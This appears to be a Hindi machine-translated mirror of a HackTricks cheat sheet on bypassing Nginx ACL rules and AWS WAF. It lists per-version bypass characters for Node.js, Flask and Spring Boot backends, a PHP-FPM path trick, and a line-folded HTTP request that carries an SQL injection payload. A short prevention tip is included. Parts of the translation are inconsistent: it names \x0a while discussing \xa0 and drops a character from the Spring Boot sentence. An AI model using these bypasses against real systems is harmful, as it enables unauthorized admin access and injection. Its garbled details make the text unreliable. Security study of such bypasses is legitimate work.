mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-23 05:03:35 +00:00
9.7 KiB
9.7 KiB
प्रॉक्सी / WAF सुरक्षा बाइपास
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- क्या आप साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप अपनी कंपनी को HackTricks में विज्ञापित देखना चाहते हैं? या क्या आपको PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग करने की आवश्यकता है? सदस्यता योजनाएं की जांच करें!
- खोजें The PEASS Family, हमारा विशेष संग्रह NFTs
- प्राप्त करें आधिकारिक PEASS & HackTricks swag
- शामिल हों 💬 Discord समूह या टेलीग्राम समूह या फॉलो करें मुझे Twitter 🐦@carlospolopm.
- अपने हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके hacktricks repo और hacktricks-cloud repo.
Nginx ACL नियमों को बाइपास करना
Nginx प्रतिबंध उदाहरण:
location = /admin {
deny all;
}
location = /admin/ {
deny all;
}
NodeJS
- जबकि Nginx
/admin
URI के लिए ACL नियम में\xa0
वर्ण शामिल करता है, इसलिए यह नियम ट्रिगर नहीं होगा। इस परिणामस्वरूप, Nginx HTTP संदेश को बैकएंड को फवर्ड करेगा; - जब Node.js सर्वर द्वारा
/admin\x0a
URI प्राप्त किया जाता है, तो\xa0
वर्ण हटा दिया जाएगा, जिससे/admin
अंत बिंदु को सफलतापूर्वक प्राप्त किया जा सकता है।
Nginx संस्करण | Node.js Bypass वर्ण |
---|---|
1.22.0 | \xA0 |
1.21.6 | \xA0 |
1.20.2 | \xA0 , \x09 , \x0C |
1.18.0 | \xA0 , \x09 , \x0C |
1.16.1 | \xA0 , \x09 , \x0C |
Flask
Flask URL पथ से \x85
, \xA0
, \x1F
, \x1E
, \x1D
, \x1C
, \x0C
, \x0B
, और \x09
वर्णों को हटा देता है, लेकिन NGINX नहीं करता है।
Nginx संस्करण | Flask Bypass वर्ण |
---|---|
1.22.0 | \x85 , \xA0 |
1.21.6 | \x85 , \xA0 |
1.20.2 | \x85 , \xA0 , \x1F , \x1E , \x1D , \x1C , \x0C , \x0B |
1.18.0 | \x85 , \xA0 , \x1F , \x1E , \x1D , \x1C , \x0C , \x0B |
1.16.1 | \x85 , \xA0 , \x1F , \x1E , \x1D , \x1C , \x0C , \x0B |
Spring Boot
नीचे, आपको दिखाया गया है कि ACL सुरक्षा को \x09
या पथनाम के अंत में जोड़कर दूर किया जा सकता है:
Nginx संस्करण | Spring Boot Bypass वर्ण |
---|---|
1.22.0 | ; |
1.21.6 | ; |
1.20.2 | \x09 , ; |
1.18.0 | \x09 , ; |
1.16.1 | \x09 , ; |
PHP-FPM
निम्नलिखित Nginx FPM कॉन्फ़िगरेशन को विचार करें:
location = /admin.php {
deny all;
}
location ~ \.php$ {
include snippets/fastcgi-php.conf;
fastcgi_pass unix:/run/php/php8.1-fpm.sock;
}
इसे बाईपास करना संभव है /admin.php/index.php
तक पहुंच कर:
कैसे रोकें
इन मुद्दों को रोकने के लिए, आपको Nginx ACL नियमों पर =
व्यक्ति की जगह ~
व्यक्ति का उपयोग करना चाहिए, उदाहरण के लिए:
location ~* ^/admin {
deny all;
}
लाइन फोल्डिंग के साथ AWS WAF ACL को बाईपास करना
यह संभव है कि एक HTTP हैडर में AWS WAF सुरक्षा को बाईपास किया जा सके, निम्नलिखित सिंटैक्स का उपयोग करके, जहां AWS WAF को समझने में नहीं होगा कि X-Query हैडर में एक SQL इंजेक्शन पेलोड है, जबकि पीछे का नोड सर्वर होगा:
GET / HTTP/1.1\r\n
Host: target.com\r\n
X-Query: Value\r\n
\t' or '1'='1' -- \r\n
Connection: close\r\n
\r\n
संदर्भ
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- क्या आप साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप अपनी कंपनी को HackTricks में विज्ञापित देखना चाहते हैं? या क्या आपको PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग करना चाहिए? सदस्यता योजनाएं की जांच करें!
- खोजें The PEASS Family, हमारा विशेष NFT संग्रह,
- प्राप्त करें आधिकारिक PEASS & HackTricks swag
- शामिल हों 💬 Discord समूह या टेलीग्राम समूह या मुझे ट्विटर पर फ़ॉलो करें 🐦@carlospolopm.
- अपने हैकिंग ट्रिक्स को हैकट्रिक्स रेपो (https://github.com/carlospolop/hacktricks) और हैकट्रिक्स-क्लाउड रेपो को PR जमा करके अपनी ट्रिक्स साझा करें।